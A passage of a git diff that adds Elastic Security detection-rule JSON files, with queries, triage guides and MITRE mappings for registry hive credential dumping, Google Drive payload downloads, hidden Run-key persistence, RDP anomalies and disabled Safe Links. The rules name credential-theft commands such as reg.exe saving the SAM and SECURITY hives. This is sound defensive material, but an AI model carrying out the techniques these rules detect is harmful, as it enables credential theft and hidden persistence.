\"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\")\n", + "references": [ + "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json new file mode 100644 index 00000000000..ca4258025a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Credential Acquisition via Registry Hive Dumping", + "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached credentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the compromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether the user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"reg.exe\" or process.name : \"reg.exe\") and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json new file mode 100644 index 00000000000..d8ce59cc56f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Credential Acquisition via Registry Hive Dumping", + "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached credentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the compromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether the user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"reg.exe\" or process.name : \"reg.exe\") and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json new file mode 100644 index 00000000000..d6045c01f27 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file download activity from a Google Drive URL. This could indicate an attempt to deliver phishing payloads via a trusted webservice.", + "false_positives": [ + "Approved third-party applications that use Google Drive download URLs.", + "Legitimate publicly shared files from Google Drive." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Downloaded from Google Drive", + "query": "process where\n\n /* common browser processes */\n event.action in (\"exec\", \"fork\", \"start\") and \n\n process.name : (\"Microsoft Edge\", \"chrome.exe\", \"Google Chrome\", \"google-chrome-stable\", \n \"google-chrome-beta\", \"google-chrome\", \"msedge.exe\", \"firefox.exe\", \"brave.exe\", \n \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\", \"firefox\", \n \"powershell.exe\", \"curl\", \"curl.exe\", \"wget\", \"wget.exe\") and \n\n /* Look for Google Drive download URL with AV flag skipping */\n (process.command_line : \"*drive.google.com*\" and process.command_line : \"*export=download*\" and process.command_line : \"*confirm=no_antivirus*\")\n", + "references": [ + "https://intelligence.abnormalsecurity.com/blog/google-drive-matanbuchus-malware" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a8afdce2-0ec1-11ee-b843-f661ea17fbcd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "a8afdce2-0ec1-11ee-b843-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json new file mode 100644 index 00000000000..70cf8718c4a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high variance of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_var_rdp_session_duration", + "name": "High Variance in RDP Session Duration", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "a8d35ca0-ad8d-48a9-9f6c-553622dca61a", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "a8d35ca0-ad8d-48a9-9f6c-553622dca61a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json new file mode 100644 index 00000000000..bc9010293dc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json new file mode 100644 index 00000000000..c330677b483 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json new file mode 100644 index 00000000000..95f176c9851 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", + "false_positives": [ + "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Link Policy Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json new file mode 100644 index 00000000000..a736075a2b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_107.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Hidden Run Key Detected", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "references": [ + "https://github.com/outflanknl/SharpHide", + "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + 